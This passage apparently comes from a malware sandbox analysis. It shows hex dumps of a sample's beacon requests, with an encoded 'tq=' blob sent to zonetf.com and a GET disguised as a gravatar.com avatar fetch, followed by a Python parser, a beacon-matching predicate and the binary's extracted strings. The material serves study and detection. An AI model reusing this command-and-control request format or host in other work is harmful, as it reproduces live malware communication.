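The five requests in the dumps above share two traits: a tq= blob of base64-alphabet characters on the query string, and either the bare "mozilla/2.0" agent with a doubled "?" on the gravatar.com GET or a body-less POST (Content-Length: 0) to /index.html. The dumps also carry bytes past the end of each request: in the second and fourth, everything from offset 0x159 on is, offset for offset, the tail of the first GET; in the third and fifth it is the end of an IIS error page. Those bytes are stale capture-buffer contents, not request bodies. The Python below is an added example, not the sandbox's code and not the malware's: it rebuilds the byte stream from the dump format used on this page, splits one HTTP request off it while honouring Content-Length so the stale bytes are kept apart as residue, extracts tq, and attempts a standard base64 decode. The POST blob (172 characters) decodes to 129 bytes; the GET blob (309 characters) has a length standard base64 cannot produce, so the decoder refuses it rather than guessing at the scheme. The second dump is copied from the page verbatim, and the GET target is rebuilt from the first dump; the beacon predicate records only what these captures show and is not a vendor signature.

```python
import base64
import binascii
import re
import urllib.parse

# Second dump from the "Raw Pcap" section above, copied verbatim (not constructed).
POST_DUMP = """\
0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78464b76 39373558   JuX%2BSNxFKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a354446 53684750   close....5DFShGP
0x00000160 (00352)   326f5442 586d7a51 65783455 5a724631   2oTBXmzQex4UZrF1
0x00000170 (00368)   67665167 344d6e25 32423342 786d7071   gfQg4Mn%2B3Bxmpq
0x00000180 (00384)   33527a71 69503271 47353277 676e2048   3RzqiP2qG52wgn H
0x00000190 (00400)   5454502f 312e300d 0a436f6e 6e656374   TTP/1.0..Connect
0x000001a0 (00416)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x000001b0 (00432)   3a206772 61766174 61722e63 6f6d0d0a   : gravatar.com..
0x000001c0 (00448)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x000001d0 (00464)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x000001e0 (00480)   2f322e30 0d0a0d0a                     /2.0....
"""
# Request target of the first dump (GET /avatar.php ... HTTP/1.0), rebuilt from its rows.
GET_TARGET = (
    "/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be1?v55=92&tq="
    "gKZEtzymKyxELk6C9E7mmOGAfMW4GyaJyGROsEX9cA%2FxBNhsle1cRrhd9WQAKPEKz1tAB96"
    "i%2FYv2uQ4G6z9ss02NgOBk6qxBVDqR8IrfdCqb62mbiN5fgysZy8Qs8NK1%2B6vIEsR8cFYpNHUwGyR"
    "8VtsIZnmh6%2B3uXgltAwU%2FmrgnQLpPPruLztei%2FZqLbGf0J%2BzJaddyi6qdpKO%2FjA4Vj5pwL"
    "YFwHtrQ7cCi57Uc47gUBLqIs5WhLb15ltfam7CJUC5DFShGP2oTBXmzQex4UZrF1gfQg4Mn%2B3Bxmpq"
    "3RzqiP2qG52wgn"
)
HEX_GROUP = re.compile(r"[0-9a-fA-F]{2,8}")
B64_ALPHABET = re.compile(r"[A-Za-z0-9+/]+")

def hexdump_to_bytes(dump):
    """Rebuild the byte stream from rows of 'offset (decimal) up-to-four-hex-groups ascii'."""
    out = bytearray()
    for line in dump.splitlines():
        tokens = line.split()
        if len(tokens) < 3 or not tokens[0].startswith("0x"):
            continue
        for tok in tokens[2:6]:  # the ASCII column begins after the fourth group
            if not HEX_GROUP.fullmatch(tok) or len(tok) % 2:
                break
            out += bytes.fromhex(tok)
    return bytes(out)

def parse_http_request(raw):
    """Split one request off the stream. Content-Length bounds the body, so anything
    after it (stale buffer contents in these dumps) comes back as 'residue'."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("request head is incomplete")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for h in header_lines:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", "0"))
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": rest[:length], "residue": rest[length:]}

def extract_tq(target):
    """Percent-decoded tq= value. The GET puts a second '?' before v55/tq, so only
    the text after the last '?' is treated as the query string."""
    query = target.rsplit("?", 1)[1]
    return urllib.parse.parse_qs(query, keep_blank_values=True)["tq"][0]

def try_base64(value):
    """Standard base64 decode when length and alphabet allow it, else None (no guessing)."""
    if len(value) % 4 == 1 or not B64_ALPHABET.fullmatch(value):
        return None
    try:
        return base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except binascii.Error:
        return None

def matches_report_beacon(req):
    """Traits shared by this report's captures; an observation, not a vendor signature."""
    if "tq=" not in req["target"]:
        return False
    ua = req["headers"].get("user-agent", "")
    if req["method"] == "GET":
        return ua.lower() == "mozilla/2.0" and req["target"].count("?") >= 2
    return req["method"] == "POST" and req["headers"].get("content-length") == "0"
```

When feeding this a live capture rather than the page's dumps, split the stream per TCP flow first; the residue field is how a parser tells you a flow buffer was reused, and it should be discarded, not decoded.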


Strings
...&.M.
...
...q[..;..........8..^..&.eU..SK..
K
m.
0h
..C.
..%..e.
..
.
M.j
..O...
<.#.
...o
..^.M5<
^l../
...`
.1n..sQ
..
.
..O
b
cl
.^
040904b0
0!P!@
1.0.0.3
1556
@!cb
DpV`
FileVersion
jjjjjj
PrivateBuild
ProductVersion
@raA
RbqB
sT@!
StringFileInfo
TIMES NEW ROMAN
Translation
! `U
VarFileInfo
VS_VERSION_INFO
0x\vaT
1h$~wf
>1=M']
1!!Z]L
29CB}+M
2c.4:4
^#@2Kq
4a*s|-
4;RFXiF4
~5*`/[
_?5=zU
=$6h@yF1,<
|;7v5a
8b@gyz
|/8le#jrq
$8Xe<|
8>xqTf
+8,X}Zgm
9*5u*^1
9#sDlcP
9zyt)4?
a6;m>S
abM!-sA
A?nYtv
.apexi
b75</4
BjT<Ug
b;m+	>
B/:	=X
CheckRemoteDebuggerPresent
CHyAN}%
>cq?tu'
CreateWindowExW
Ctkm(s
cwld{Xn
{d,	&A
@.data
dc<(%zj
dg#-X;
;dndxb
dYXduC
e&[%4m
E!9<UF
$eiKlg
EndDialog
EnumResourceTypesW
e$oDa:
FqXRT.
f-r#nr
Fy*:Lw
*=g5-m|
gCsfzx
/^!GdE]
GetFileType
GetParent
GetStartupInfoA
GetWindowInfo
gg%3-W
g[LM%/
HeapCreate
.!h{,M\
hR(2-T
IC3tTR
I=c=fV
IlFt(L
InitializeCriticalSection
+.ize 
Jid^nV
j_(kn4
,'J~|N
-j[o62
$$}j	sr
Jtnc~;
*J:t	tg
-JYmy=
KERNEL32.dll
Kf8O~+A
Kfr{@'B
{kH9N,
(k"hb;|
/ki?v.
L$GbKE
lMJ@/y
LoadCursorW
LresultFromObject
lstrcpynW
m0KPq7E4
MessageBoxW
mL9|sy
`moHb5,M
/mPA yN
mR1yj2K^^W
$mu-qm
n#FM!n
&;nKth*
<NT>d4x
|n<VBI
NXKo6%
Ogd$3O
O%KQZH
OLEACC.dll
OLo382
Olq<-Xw
O[\%OYE
oV$>S741E
}P2j\#
Q6yPKp
*qfj;D
<]^]QH
r9DW*X0
r9olF}
`.rdata
RegisterClassExW
r N,rU
$S Jzn
,S{M~R
	SP)	hRrqt
*SXkQY
!This program cannot be run in DOS mode.
TlsAlloc
TlsFree
TlsGetValue
T]n/u^
<t%(t:y6
TU1c&,p
U<b6T_
ug9 _RC
uH]4!'
;->uJHp
U}n#"Z
USER32.dll
*V>0q*
v1.3r'
vdl*NNK
v*Z6XL
-<>W{@
wJzIJ\
,}w*mc
[WZ5U2
>'yD$$6
\yD	VT
Yhil+R
y'ik0a
]yNZ@y1
yR%t\`
Yv,Wkbyu@3
z3Da>L;c
Z3EQZQho
zB*h](G
z MuP 
Zowl}0